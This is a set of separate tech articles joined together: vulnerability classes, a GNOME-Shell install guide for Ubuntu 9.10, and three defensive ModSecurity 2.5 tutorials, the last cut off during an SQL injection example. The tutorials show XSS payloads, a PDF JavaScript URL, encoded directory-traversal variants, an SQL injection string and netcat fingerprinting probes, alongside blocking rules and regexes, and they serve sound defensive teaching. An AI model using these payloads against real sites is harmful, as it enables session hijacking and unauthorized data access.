Configuration Weakness Vulnerabilities

It is an error due to the improper configuration of system parameters, or leaving the default configuration settings in place, which may not be secure.

Examples: default security policy configuration; file and print access in Internet connection sharing

Security violation and impact: most of the default configuration settings of many software applications are published and available in the public domain. For example, some applications come with standard default passwords. If they are not secured, they allow an attacker to compromise the system. Configuration weaknesses are also exploited to gain higher privileges, resulting in privilege escalation impacts.

Exception Handling Vulnerabilities

It is an error due to improper setup or coding, where the system fails to handle, or properly respond to, exceptional or unexpected data or conditions.

Example: SQL injection

Security violation and impact: by injecting exceptional data, user credentials can be captured by an unauthorized entity.

Input Validation Vulnerabilities

It is an error due to a lack of verification mechanisms to validate the input data or contents.

Examples: directory traversal; malformed URLs

Security violation and impact: due to poor input validation, access to system-privileged programs may be obtained.

Randomization Vulnerabilities

It is an error due to insufficient randomness in the data used by a process. These vulnerabilities predominantly relate to encryption algorithms.

Examples: weak encryption key; insufficient random data

Security violation and impact: the cryptographic key can be compromised, which will impact data and access security.

Resource Vulnerabilities

It is an error due to a lack of resource availability for correct operations or processes.
Examples: memory getting full; CPU completely utilized

Security violation and impact: due to the lack of resources the system becomes unstable or hangs. This results in a denial of service to legitimate users.

State Error

It is an error that results from a lack of state maintenance due to incorrect process flows.

Example: opening multiple tabs in web browsers

Security violation and impact: specific security attacks, such as cross-site scripting (XSS), can result in user-authenticated sessions being hijacked.

Information security professionals need to be aware of the processes involved in identifying system vulnerabilities. It is important to devise suitable countermeasures, in a cost-effective and efficient way, to reduce the risk factor associated with the identified vulnerabilities. Some such measures are applying patches supplied by the application vendors and hardening the systems.
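As an illustration of the input-validation countermeasure against directory traversal mentioned above, here is a hypothetical path check (our own sketch, not from the article) that rejects requests escaping the web root:

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class PathCheck {
    // Reject requests whose normalized path escapes the web root --
    // a minimal input-validation defence against directory traversal.
    static boolean isInsideRoot(String root, String requested) {
        Path base = Paths.get(root).toAbsolutePath().normalize();
        Path target = base.resolve(requested).normalize();
        return target.startsWith(base);
    }
}
```

A request for "index.html" passes, while "../../etc/passwd" normalizes to a path outside the root and is rejected.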
Install GNOME-Shell on Ubuntu 9.10 "Karmic Koala"

Packt
18 Jan 2010
3 min read
Remember, these are development builds and preview snapshots, and are still in the early stages. While it appears to be functional (so far) your mileage may vary.

Installing GNOME-Shell

With the release of Ubuntu 9.10, a GNOME-Shell preview is included in the repositories. This makes it very easy to install (and remove) as needed. The downside is that it is just a snapshot, so you are not running the latest-greatest builds. For this reason I've included instructions on installing the package as well as compiling the latest builds. I should also note that GNOME Shell requires reasonable 3D support. This means that it will likely *not* work within a virtual machine. In particular, problems have been reported trying to run GNOME Shell with 3D support in VirtualBox.

Package Installation

If you'd prefer to install the package and just take a sneak-peek at the snapshot, simply run the command below in your terminal:

sudo aptitude install gnome-shell

Manual Compilation

Manually compiling GNOME Shell will allow you to use the latest and greatest builds, but it can also require more work. The notes below are based on a successful build I did in late 2009, but your mileage may vary. If you run into problems please note the following: installing GNOME Shell does not affect your current installation, so if the build breaks you should still have a clean environment. You can find more details as well as known issues here: GnomeShell

There is one package that you'll need to compile GNOME Shell called jhbuild. This package, however, has been removed from the Ubuntu 9.10 repositories for being outdated. I did find that I could use the package from the 9.04 repository and haven’t noticed any problems in doing so. To install jhbuild from the 9.04 repository use the instructions below:

1. Visit http://packages.ubuntu.com/jaunty/all/jhbuild/download
2. Select a mirror close to you
3. Download / install the .deb package.
I don’t believe there are any additional dependencies needed for this package. After that package is installed you’ll want to download a GNOME Shell Build Setup script, which makes this entire process much, much simpler.

cd ~
wget http://git.gnome.org/cgit/gnome-shell/plain/tools/build/gnome-shell-build-setup.sh

This script will handle finding and installing dependencies as well as compiling the builds. To launch this script, run the command:

gnome-shell-build-setup.sh

You'll need to ensure that any suggested packages are installed before continuing. You may need to re-run this script multiple times until it has no more warnings. Lastly, you can begin the build process. This process took about twenty minutes on my C2D 2.0Ghz Dell laptop. My build was completely automated, but considering this is building newer and newer builds, your mileage may vary. To begin the build process on your machine, run the command:

jhbuild build

Ready To Launch

Congratulations! You've now got GNOME-Shell installed and ready to launch. I've outlined the steps below. Please take note of the method, depending on how you installed. Also, please note that before you launch GNOME-Shell you must DISABLE Compiz. If you have Compiz running, navigate to System > Preferences > Appearances and disable it under the Desktop Effects tab.

Package Installation: launch with

gnome-shell --replace

Manual Compilation: launch as follows:

~/gnome-shell/source/gnome-shell/src/gnome-shell --replace
Blocking Common Attacks using ModSecurity 2.5: Part 2

Packt
01 Dec 2009
11 min read
Cross-site scripting

Cross-site scripting attacks occur when user input is not properly sanitized and ends up in pages sent back to users. This makes it possible for an attacker to include malicious scripts in a page by providing them as input to the page. The scripts will be no different from scripts included in pages by the website creators, and will thus have all the privileges of an ordinary script within the page—such as the ability to read cookie data and session IDs. In this article we will look in more detail at how to prevent such attacks. The name "cross-site scripting" is actually rather poorly chosen—the name stems from the first such vulnerability that was discovered, which involved a malicious website using HTML framesets to load an external site inside a frame. The malicious site could then manipulate the loaded external site in various ways—for example, read form data, modify the site, and basically perform any scripting action that a script within the site itself could perform. Thus cross-site scripting, or XSS, was the name given to this kind of attack. The attacks described as XSS attacks have since shifted from malicious frame injection (a problem that was quickly patched by web browser developers) to the class of attacks that we see today involving unsanitized user input. The actual vulnerability referred to today might be better described as a "malicious script injection attack", though that doesn't give it quite as flashy an acronym as XSS. (And in case you're curious why the acronym is XSS and not CSS, the simple explanation is that although CSS was used as short for cross-site scripting in the beginning, it was changed to XSS because so many people were confusing it with the acronym used for Cascading Style Sheets, which is also CSS.) Cross-site scripting attacks can lead not only to cookie and session data being stolen, but also to malware being downloaded and executed, and to the injection of arbitrary content into web pages.
Cross-site scripting attacks can generally be divided into two categories:

Reflected attacks: This kind of attack exploits cases where the web application takes data provided by the user and includes it without sanitization in output pages. The attack is called "reflected" because an attacker causes a user to provide a malicious script to a server in a request that is then reflected back to the user in returned pages, causing the script to execute.

Stored attacks: In this type of XSS attack, the attacker is able to include his malicious payload into data that is permanently stored on the server and will be included without any HTML entity encoding to subsequent visitors to a page. Examples include storing malicious scripts in forum posts or user presentation pages. This type of XSS attack has the potential to be more damaging since it can affect every user who views a certain page.

Preventing XSS attacks

The most important measure you can take to prevent XSS attacks is to make sure that all user-supplied data that is output in your web pages is properly sanitized. This means replacing potentially unsafe characters, such as angled brackets (< and >) with their corresponding HTML-entity encoded versions—in this case &lt; and &gt;. Here is a list of characters that you should encode when present in user-supplied data that will later be included in web pages:

Character   HTML-encoded version
<           &lt;
>           &gt;
(           &#40;
)           &#41;
#           &#35;
&           &amp;
"           &quot;
'           &#39;

In PHP, you can use the htmlentities() function to achieve this. When encoded, the string <script> will be converted into &lt;script&gt;. This latter version will be displayed as <script> in the web browser, without being interpreted as the start of a script by the browser. In general, users should not be allowed to input any HTML markup tags if it can be avoided.
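The encoding table can be implemented as a small helper. The article uses PHP's htmlentities(); the following is a hypothetical Java equivalent of ours that covers exactly the characters in the table:

```java
public class HtmlEncoder {
    // Replace each character from the encoding table with its
    // HTML-entity encoded version; everything else passes through.
    static String encode(String input) {
        StringBuilder out = new StringBuilder();
        for (char c : input.toCharArray()) {
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '(':  out.append("&#40;");  break;
                case ')':  out.append("&#41;");  break;
                case '#':  out.append("&#35;");  break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}
```

With this helper, encode("<script>") yields &lt;script&gt;, which the browser displays literally instead of interpreting as the start of a script.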
If you do allow markup such as <a href="..."> to be input by users in blog comments, forum posts, and similar places, then you should be aware that simply filtering out the <script> tag is not enough, as this simple example shows:

<a href="http://www.google.com" onMouseOver="javascript:alert('XSS Exploit!')">Innocent link</a>

This link will execute the JavaScript code contained within the onMouseOver attribute whenever the user hovers his mouse pointer over the link. You can see why even if the web application replaced <script> tags with their HTML-encoded version, an XSS exploit would still be possible by simply using onMouseOver or any of the other related events available, such as onClick or onMouseDown. I want to stress that properly sanitizing user input as just described is the most important step you can take to prevent XSS exploits from occurring. That said, if you want to add an additional line of defense by creating ModSecurity rules, here are some common XSS script fragments and regular expressions for blocking them:

Script fragment   Regular expression
<script           <script
eval(             eval\s*\(
onMouseOver       onmouseover
onMouseOut        onmouseout
onMouseDown       onmousedown
onMouseMove       onmousemove
onClick           onclick
onDblClick        ondblclick
onFocus           onfocus

PDF XSS protection

You may have seen the ModSecurity directive SecPdfProtect mentioned, and wondered what it does. This directive exists to protect users from a particular class of cross-site scripting attack that affects users running a vulnerable version of the Adobe Acrobat PDF reader. A little background is required in order to understand what SecPdfProtect does and why it is necessary. In 2007, Stefano Di Paola and Giorgio Fedon discovered a vulnerability in Adobe Acrobat that allows attackers to insert JavaScript into requests, which is then executed by Acrobat in the context of the site hosting the PDF file. Sound confusing? Hang on, it will become clearer in a moment.
The vulnerability was quickly fixed by Adobe in version 7.0.9 of Acrobat. However, there are still many users out there running old versions of the reader, which is why preventing this sort of attack is still an ongoing concern. The basic attack works like this: An attacker entices the victim to click a link to a PDF file hosted on www.example.com. Nothing unusual so far, except for the fact that the link looks like this: http://www.example.com/document.pdf#x=javascript:alert('XSS'); Surprisingly, vulnerable versions of Adobe Acrobat will execute the JavaScript in the above link. It doesn't even matter what you place before the equal sign, gibberish= will work just as well as x= in triggering the exploit. Since the PDF file is hosted on the domain www.example.com, the JavaScript will run as if it was a legitimate piece of script within a page on that domain. This can lead to all of the standard cross-site scripting attacks that we have seen examples of before. This diagram shows the chain of events that allows this exploit to function: The vulnerability does not exist if a user downloads the PDF file and then opens it from his local hard drive. ModSecurity solves the problem of this vulnerability by issuing a redirect for all PDF files. The aim is to convert any URLs like the following: http://www.example.com/document.pdf#x=javascript:alert('XSS'); into a redirected URL that has its own hash character: http://www.example.com/document.pdf#protection This will block any attacks attempting to exploit this vulnerability. The only problem with this approach is that it will generate an endless loop of redirects, as ModSecurity has no way of knowing what is the first request for the PDF file, and what is a request that has already been redirected. ModSecurity therefore uses a one-time token to keep track of redirect requests. All redirected requests get a token included in the new request string. 
The redirect link now looks like this:

http://www.example.com/document.pdf?PDFTOKEN=XXXXX#protection

ModSecurity keeps track of these tokens so that it knows which links are valid and should lead to the PDF file being served. Even if a token is not valid, the PDF file will still be available to the user; he will just have to download it to the hard drive. These are the directives used to configure PDF XSS protection in ModSecurity:

SecPdfProtect On
SecPdfProtectMethod TokenRedirection
SecPdfProtectSecret "SecretString"
SecPdfProtectTimeout 10
SecPdfProtectTokenName "token"

The above configures PDF XSS protection, and uses the secret string SecretString to generate the one-time tokens. The last directive, SecPdfProtectTokenName, can be used to change the name of the token argument (the default is PDFTOKEN). This can be useful if you want to hide the fact that you are running ModSecurity, but unless you are really paranoid it won't be necessary to change this. The SecPdfProtectMethod can also be set to ForcedDownload, which will force users to download the PDF files instead of viewing them in the browser. This can be an inconvenience to users, so you would probably not want to enable this unless circumstances warrant (for example, if a new PDF vulnerability of the same class is discovered in the future).

HttpOnly cookies to prevent XSS attacks

One mechanism to mitigate the impact of XSS vulnerabilities is the HttpOnly flag for cookies.
This extension to the cookie protocol was proposed by Microsoft (see http://msdn.microsoft.com/en-us/library/ms533046.aspx for a description), and is currently supported by the following browsers:

- Internet Explorer (IE6 SP1 and later)
- Firefox (2.0.0.5 and later)
- Google Chrome (all versions)
- Safari (3.0 and later)
- Opera (version 9.50 and later)

HttpOnly cookies work by adding the HttpOnly flag to cookies that are returned by the server, which instructs the web browser that the cookie should only be used when sending HTTP requests to the server and should not be made available to client-side scripts via, for example, the document.cookie property. While this doesn't completely solve the problem of XSS attacks, it does mitigate those attacks where the aim is to steal valuable information from the user's cookies, such as session IDs. A cookie header with the HttpOnly flag set looks like this:

Set-Cookie: SESSID=d31cd4f599c4b0fa4158c6fb; HttpOnly

HttpOnly cookies need to be supported on the server side for the clients to be able to take advantage of the extra protection afforded by them. Some web development platforms currently support HttpOnly cookies through the use of the appropriate configuration option. For example, PHP 5.2.0 and later allow HttpOnly cookies to be enabled for a page by using the following ini_set() call:

<?php ini_set("session.cookie_httponly", 1); ?>

Tomcat (a Java Servlet and JSP server) version 6.0.19 and later supports HttpOnly cookies, and they can be enabled by modifying a context's configuration so that it includes the useHttpOnly option, like so:

<Context>
  <Manager useHttpOnly="true" />
</Context>

In case you are using a web platform that doesn't support HttpOnly cookies, it is actually possible to use ModSecurity to add the flag to outgoing cookies. We will see how to do this now.
Session identifiers

Assuming we want to add the HttpOnly flag to session identifier cookies, we need to know which cookies are associated with session identifiers. The following table lists the name of the session identifier cookie for some of the most common languages:

Language   Session identifier cookie name
PHP        PHPSESSID
JSP        JSESSIONID
ASP        ASPSESSIONID
ASP.NET    ASP.NET_SessionId

The table shows us that a good regular expression to identify session IDs would be (sessionid|sessid), which can be shortened to sess(ion)?id. The web programming language you are using might use another name for the session cookie. In that case, you can always find out what it is by looking at the headers returned by the server:

echo -e "GET / HTTP/1.1\nHost: yourserver.com\n\n" | nc yourserver.com 80 | head

Look for a line similar to:

Set-Cookie: JSESSIONID=4EFA463BFB5508FFA0A3790303DE0EA5; Path=/

This is the session cookie—in this case its name is JSESSIONID, since the server is running Tomcat and the JSP web application language. The following rules are used to add the HttpOnly flag to session cookies:

# Add HttpOnly flag to session cookies
SecRule RESPONSE_HEADERS:Set-Cookie "!(?i:HttpOnly)" "phase:3,chain,pass"
SecRule MATCHED_VAR "(?i:sess(ion)?id)" "setenv:session_cookie=%{MATCHED_VAR}"
Header set Set-Cookie "%{SESSION_COOKIE}e; HttpOnly" env=session_cookie

We are putting the rule chain in phase 3—RESPONSE_HEADERS, since we want to inspect the response headers for the presence of a Set-Cookie header. We are looking for those Set-Cookie headers that do not contain an HttpOnly flag. The (?i: ) parentheses are a regular expression construct known as a mode-modified span. This tells the regular expression engine to ignore the case of the HttpOnly string when attempting to match.
Using the t:lowercase transform would have been more complicated, as we will be using the matched variable in the next rule, and we don't want the case of the variable modified when we set the environment variable.
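The decision made by the rule chain can be mirrored in a few lines of Java. This is a hypothetical sketch of the logic only, not ModSecurity's implementation: a Set-Cookie header needs the flag appended when it names a session cookie and does not already carry HttpOnly.

```java
public class HttpOnlyCheck {
    // Mirror the two checks of the rule chain: the header must match
    // sess(ion)?id case-insensitively, and must not already contain
    // an HttpOnly flag (also matched case-insensitively).
    static boolean needsHttpOnly(String setCookieHeader) {
        String lower = setCookieHeader.toLowerCase();
        boolean isSession = lower.matches(".*sess(ion)?id.*");
        boolean hasFlag = lower.contains("httponly");
        return isSession && !hasFlag;
    }
}
```

For example, needsHttpOnly("JSESSIONID=4EFA46; Path=/") is true, while a header that already ends in "; HttpOnly" or a non-session cookie such as "theme=dark" is left alone.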
Blocking Common Attacks using ModSecurity 2.5: Part 1

Packt
01 Dec 2009
11 min read
Web applications can be attacked from a number of different angles, which is what makes defending against them so difficult. Here are just a few examples of where things can go wrong to allow a vulnerability to be exploited:

- The web server process serving requests can be vulnerable to exploits. Even servers such as Apache, which have a good security track record, can still suffer from security problems - it's just a part of the game that has to be accepted.
- The web application itself is of course a major source of problems. Originally, HTML documents were meant to be just that - documents. Over time, and especially in the last few years, they have evolved to also include code, such as client-side JavaScript. This can lead to security problems. A parallel can be drawn to Microsoft Office, which in earlier versions was plagued by security problems in its macro programming language. This, too, was caused by documents and executable code being combined in the same file.
- Supporting modules, such as mod_php which is used to run PHP scripts, can be subject to their own security vulnerabilities.
- Backend database servers, and the way that the web application interacts with them, can be a source of problems ranging from disclosure of confidential information to loss of data.

HTTP fingerprinting

Only amateur attackers blindly try different exploits against a server without having any idea beforehand whether they will work or not. More sophisticated adversaries will map out your network and system to find out as much information as possible about the architecture of your network and what software is running on your machines. An attacker looking to break in via a web server will try to find one he knows he can exploit, and this is where a method known as HTTP fingerprinting comes into play.
We are all familiar with fingerprinting in everyday life - the practice of taking a print of the unique pattern of a person's finger to be able to identify him or her - for purposes such as identifying a criminal or opening the access door to a biosafety laboratory. HTTP fingerprinting works in a similar manner by examining the unique characteristics of how a web server responds when probed and constructing a fingerprint from the gathered information. This fingerprint is then compared to a database of fingerprints for known web servers to determine what server name and version is running on the target system. More specifically, HTTP fingerprinting works by identifying subtle differences in the way web servers handle requests - a differently formatted error page here, a slightly unusual response header there - to build a unique profile of a server that allows its name and version number to be identified. Depending on which viewpoint you take, this can be useful to a network administrator to identify which web servers are running on a network (and which might be vulnerable to attack and need to be upgraded), or it can be useful to an attacker since it will allow him to pinpoint vulnerable servers. We will be focusing on two fingerprinting tools:

httprint: One of the original tools - the current version is 0.321 from 2005, so it hasn't been updated with new signatures in a while. Runs on Linux, Windows, Mac OS X, and FreeBSD.

httprecon: A newer tool which was first released in 2007 and is still in active development. Runs on Windows.

Let's first run httprecon against a standard Apache 2.2 server, and then run httprint against the same server and see what happens. As we can see, both tools correctly guess that the server is running Apache. They get the minor version number wrong, but both tell us that the major version is Apache 2.x. Try it against your own server!
You can download httprint at http://www.net-square.com/httprint/ and httprecon at http://www.computec.ch/projekte/httprecon/.

Tip: If you get the error message Fingerprinting Error: Host/URL not found when running httprint, then try specifying the IP address of the server instead of the hostname.

The fact that both tools are able to identify the server should come as no surprise as this was a standard Apache server with no attempts made to disguise it. In the following sections, we will be looking at how fingerprinting tools distinguish different web servers and see if we are able to fool them into thinking the server is running a different brand of web server software.

How HTTP fingerprinting works

There are many ways a fingerprinting tool can deduce which type and version of web server is running on a system. Let's take a look at some of the most common ones.

Server banner

The server banner is the string returned by the server in the Server response header (for example: Apache/1.3.3 (Unix) (Red Hat/Linux)). This banner can be changed by using the ModSecurity directive SecServerSignature. Here is what to do to change the banner:

# Change the server banner to MyServer 1.0
ServerTokens Full
SecServerSignature "MyServer 1.0"

Response header

The HTTP response header contains a number of fields that are shared by most web servers, such as Server, Date, Accept-Ranges, Content-Length, and Content-Type. The order in which these fields appear can give a clue as to which web server type and version is serving the response. There can also be other subtle differences - the Netscape Enterprise Server, for example, prints its headers as Last-modified and Accept-ranges, with a lowercase letter in the second word, whereas Apache and Internet Information Server print the same headers as Last-Modified and Accept-Ranges.
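The header-order signal described above can be extracted with a few lines of code. This is our own illustrative sketch, not taken from httprint or httprecon:

```java
import java.util.ArrayList;
import java.util.List;

public class HeaderOrder {
    // Extract response header names in order of appearance -- the
    // ordering is one of the subtle differences fingerprinting
    // tools use to build a server profile.
    static List<String> headerNames(String rawResponse) {
        List<String> names = new ArrayList<>();
        for (String line : rawResponse.split("\r?\n")) {
            if (line.isEmpty()) {
                break; // blank line ends the header section
            }
            int colon = line.indexOf(':');
            if (colon > 0 && !line.startsWith("HTTP/")) {
                names.add(line.substring(0, colon));
            }
        }
        return names;
    }
}
```

Comparing the resulting name list (and its exact capitalization) against lists recorded for known servers is one building block of a fingerprint.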
HTTP protocol responses

Another way to gain information about a web server is to issue a non-standard or unusual HTTP request and observe the response that is sent back by the server.

Issuing an HTTP DELETE request

The HTTP DELETE command is meant to be used to delete a document from a server. Of course, all servers require that a user is authenticated before this happens, so a DELETE command from an unauthorized user will result in an error message - the question is just which error message exactly, and which HTTP error number the server will use for the response page. Here is a DELETE request issued to our Apache server:

$ nc bytelayer.com 80
DELETE / HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Date: Mon, 27 Apr 2009 09:10:49 GMT
Server: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method DELETE is not allowed for the URL /index.html.</p>
<hr>
<address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address>
</body></html>

As we can see, the server returned a 405 - Method Not Allowed error. The error message accompanying this response in the response body is The requested method DELETE is not allowed for the URL /index.html.
Now compare this with the following response, obtained by issuing the same request to a server at www.iis.net:

$ nc www.iis.net 80
DELETE / HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CSAnonymous=LmrCfhzHyQEkAAAANWY0NWY1NzgtMjE2NC00NDJjLWJlYzYtNTc4ODg0OWY5OGQz0; domain=iis.net; expires=Mon, 27-Apr-2009 09:42:35 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 27 Apr 2009 09:22:34 GMT
Connection: close
Content-Length: 1293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>405 - HTTP verb used to access this page is not allowed.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>405 - HTTP verb used to access this page is not allowed.</h2>
<h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>
</fieldset></div>
</div>
</body>
</html>

The site www.iis.net is Microsoft's official site for its web server platform Internet Information Services, and the Server response header indicates that it is indeed running IIS 7.0.
(We have of course already seen that it is a trivial operation in most cases to fake this header, but given the fact that it's Microsoft's official IIS site, we can be pretty sure that they are indeed running their own web server software.) The response generated by IIS carries the same HTTP error code, 405; however, there are many subtle differences in the way the response is generated. Here are just a few:

- IIS uses spaces between method names in the comma-separated list for the Allow field, whereas Apache does not
- The response header field order differs - for example, Apache has the Date field first, whereas IIS starts out with the Allow field
- IIS uses the error message The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access in the response body

Bad HTTP version numbers

A similar experiment can be performed by specifying a non-existent HTTP protocol version number in a request. Here is what happens on the Apache server when the request GET / HTTP/5.0 is issued:

$ nc bytelayer.com 80
GET / HTTP/5.0

HTTP/1.1 400 Bad Request
Date: Mon, 27 Apr 2009 09:36:10 GMT
Server: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2
Content-Length: 295
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br /></p>
<hr>
<address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address>
</body></html>

There is no HTTP version 5.0, and there probably won't be for a long time, as the latest revision of the protocol carries version number 1.1. The Apache server responds with a 400 - Bad Request error, and the accompanying error message in the response body is Your browser sent a request that this server could not understand.
Now let's see what IIS does:

$ nc www.iis.net 80
GET / HTTP/5.0

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 27 Apr 2009 09:38:37 GMT
Connection: close
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid Hostname</h2>
<hr><p>HTTP Error 400. The request hostname is invalid.</p>
</BODY></HTML>

We get the same error number, but the error message in the response body differs - this time it's HTTP Error 400. The request hostname is invalid. As HTTP 1.1 requires a Host header to be sent with requests, it is obvious that IIS assumes that any later protocol would also require this header to be sent, and the error message reflects this fact.
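These probes are easy to script. The Python sketch below reproduces the nc sessions above; build_probe and send_probe are hypothetical helper names, and send_probe naturally needs network access to the target host:

```python
import socket

def build_probe(method: str, path: str = "/", version: str = "1.0") -> bytes:
    # nc-style raw request: a bare request line plus the terminating blank line
    return f"{method} {path} HTTP/{version}\r\n\r\n".encode()

def send_probe(host: str, request: bytes, port: int = 80,
               timeout: float = 5.0) -> bytes:
    """Send raw bytes to the server and collect the full response."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)
```

For example, send_probe("bytelayer.com", build_probe("DELETE")) reproduces the DELETE probe, and build_probe("GET", "/", "5.0") builds the bad-version probe.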
Packt
01 Dec 2009
12 min read

Blocking Common Attacks using ModSecurity 2.5: Part 3

Source code revelation

Normally, requesting a file with a .php extension will cause mod_php to execute the PHP code contained within the file and then return the resulting web page to the user. If the web server is misconfigured (for example, if mod_php is not loaded) then the .php file will be sent by the server without interpretation, and this can be a security problem. If the source code contains credentials used to connect to an SQL database then that opens up an avenue for attack, and of course the source code being available will allow a potential attacker to scrutinize the code for vulnerabilities.

Preventing source code revelation is easy. With response body access on in ModSecurity, simply add a rule to detect the opening PHP tag:

# Prevent PHP source code from being disclosed
SecRule RESPONSE_BODY "<?" "deny,msg:'PHP source code disclosure blocked'"

Preventing Perl and JSP source code from being disclosed works in a similar manner:

# Prevent Perl source code from being disclosed
SecRule RESPONSE_BODY "#!/usr/bin/perl" "deny,msg:'Perl source code disclosure blocked'"

# Prevent JSP source code from being disclosed
SecRule RESPONSE_BODY "<%" "deny,msg:'JSP source code disclosure blocked'"

Directory traversal attacks

Normally, all web servers should be configured to reject attempts to access any document that is not under the web server's root directory. For example, if your web server root is /home/www, then attempting to retrieve /home/joan/.bashrc should not be possible, since this file is not located under the /home/www web server root. The obvious attempt to access the /home/joan directory is, of course, easy for the web server to block; however, there is a more subtle way to access this directory which still allows the path to start with /home/www, and that is to make use of the .. symbolic directory link which links to the parent directory in any given directory.
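The essence of the check ModSecurity performs on the .. trick - URL-decode first, then look for the traversal sequence - can be sketched in a few lines of Python. The helper name is invented, and decoding twice is my own addition to also catch double-encoded payloads such as %252e%252e%252f:

```python
from urllib.parse import unquote

def is_traversal(uri: str) -> bool:
    # mirror ModSecurity's t:urlDecode, then match "../";
    # decoding twice additionally catches double-encoded payloads
    decoded = unquote(unquote(uri))
    return "../" in decoded
```

A request URI like /app?file=%2e%2e%2fetc/passwd decodes to contain ../ and is flagged, while normal paths pass through.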
Even though most web servers are hardened against this sort of attack, web applications that accept input from users may still not be checking it properly, potentially allowing users to get access to files they shouldn't be able to view via simple directory traversal attacks. This alone is reason to implement protection against this sort of attack using ModSecurity rules. Furthermore, keeping with the principle of Defense in Depth, having multiple protections against this vulnerability can be beneficial in case the web server should contain a flaw that allows this kind of attack in certain circumstances.

There is more than one way to validly represent the .. link to the parent directory. URL encoding of .. yields %2e%2e, and adding the final slash at the end, we end up with %2e%2e%2f. Here, then, is a list of what needs to be blocked:

../
..%2f
.%2e/
%2e%2e%2f
%2e%2e/
%2e./

Fortunately, we can use the ModSecurity transformation t:urlDecode. This function does all the URL decoding for us, allowing us to ignore the percent-encoded variants, and thus only one rule is needed to block these attacks:

SecRule REQUEST_URI "../" "t:urlDecode,deny"

Blog spam

The rise of weblogs, or blogs, as a new way to present information, share thoughts, and keep an online journal has made way for a new phenomenon: blog comments designed to advertise a product or drive traffic to a website. Blog spam isn't a security problem per se, but it can be annoying and cost a lot of time when you have to manually remove spam comments (or delete them from the approval queue, if comments have to be approved before being posted on the blog). Blog spam can be mitigated by collecting a list of the most common spam phrases, and using the ability of ModSecurity to scan POST data. Any attempted blog comment that contains one of the offending phrases can then be blocked.
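The phrase-list idea is simple enough to prototype outside ModSecurity. Here is a minimal Python sketch; the function names are invented, and ModSecurity's own @pmFromFile operator uses a much faster set-based pattern matcher than this linear scan:

```python
def load_phrases(path: str) -> list[str]:
    """Read one spam phrase per line, lowercased; blank lines are skipped."""
    with open(path) as f:
        return [line.strip().lower() for line in f if line.strip()]

def is_spam(comment: str, phrases: list[str]) -> bool:
    # emulate t:lowercase followed by a phrase-list match
    text = comment.lower()
    return any(phrase in text for phrase in phrases)
```

Because the match is a plain substring test, whole sentences in the phrase file work just as well as single words.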
From both a performance and maintainability perspective, using the @pmFromFile operator is the best choice when dealing with large word lists such as spam phrases. To create the list of phrases to be blocked, simply insert them into a text file, for example, /usr/local/spamlist.txt:

viagra
v1agra
auto insurance
rx medications
cheap medications
...

Then create ModSecurity rules to block those phrases when they are used in locations such as the page that creates new blog comments:

#
# Prevent blog spam by checking comment against known spam
# phrases in file /usr/local/spamlist.txt
#
<Location /blog/comment.php>
  SecRule ARGS "@pmFromFile /usr/local/spamlist.txt" "t:lowercase,deny,msg:'Blog spam blocked'"
</Location>

Keep in mind that the spam list file can contain whole sentences - not just single words - so be sure to take advantage of that fact when creating the list of known spam phrases.

SQL injection

SQL injection attacks can occur if an attacker is able to supply data to a web application that is then used in unsanitized form in an SQL query. This can cause the SQL query to do completely different things than intended by the developers of the web application. Consider an SQL query like this:

SELECT * FROM user WHERE username = '%s' AND password = '%s';

The flaw here is that if someone can provide a password that looks like ' OR '1'='1, then the query, with username and password inserted, will become:

SELECT * FROM user WHERE username = 'anyuser' AND password = '' OR '1'='1';

